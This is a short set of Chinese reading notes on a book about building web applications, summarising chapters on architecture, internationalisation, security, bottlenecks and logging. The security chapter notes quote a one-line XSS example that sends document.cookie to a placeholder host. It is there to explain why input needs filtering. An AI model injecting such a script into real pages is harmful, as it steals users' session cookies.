第零章 读后感
半天看完的,重点还是在第九章,讲安全的一章也很有意义,会让我们在开发中多留心一点。
对于web扩展,也有了一些初步的想法,对web的整体思想也有了更进一步的了解。
个人感觉不错,适合快速阅读。仅仅是个人意见。
第一章 绪论
1.作者构建的第一个web应用:是一个虚拟生物,玩家在虚拟的世界中跟踪这个生物成长,每天两次通过电子邮件发送给玩家。(这个创意非常不错)
2.Flickr有10W源代码,5W模板代码,1万js代码。
3.快速迭代往往有助于web应用的开发。
4.代码越早工作,就越早解决设计中的问题。由于开发用时少,在需要的时候就更容易放弃他。
第二章 Web应用程序体系结构
1.忘记那些微不足道的调整,不成熟的优化是罪恶之源。
2.这一章主要讲怎么处理硬件的一类问题。
第三章 开发环境
1.三大规则
源码控制、单步创建、跟踪bug
第四章 国际化和本地化
1.对应英语
国际化:i18n
本地化:l10n
2.这一章讲各个软件和工具怎么设置编码。
第五章 数据一致和安全
1.所谓数据完整性策略,就是一套规则和规章,他们关心的是应用程序如何做到存储和输出预期数据。
2.HTML输入过滤
a.js的攻击
<script> location.href='http://www.xxx.com/?cookies='+document.cookie; </script>
b.style
<style>
body{display:none !important;}
</style>
c.协议过滤
about:blank ftp:/sv.com
3.sql注入攻击
第六章 电子邮件
第七章 远程服务
第八章 瓶颈
1.cpu的使用,这个基本从来不会是web应用程序的瓶颈。
第九章 见《构建可扩张的web站点》读书笔记
第十章 统计日志、检测与警告
1.日志分访问日志和错误日志
2.可以关心一些开源的日志分析器,如:analog
3.这一章还讲了各个应用程序、开源工具的状态查看和检测。
第十一章 APIs
讲解数据订阅的问题。现在还不需要知道。
完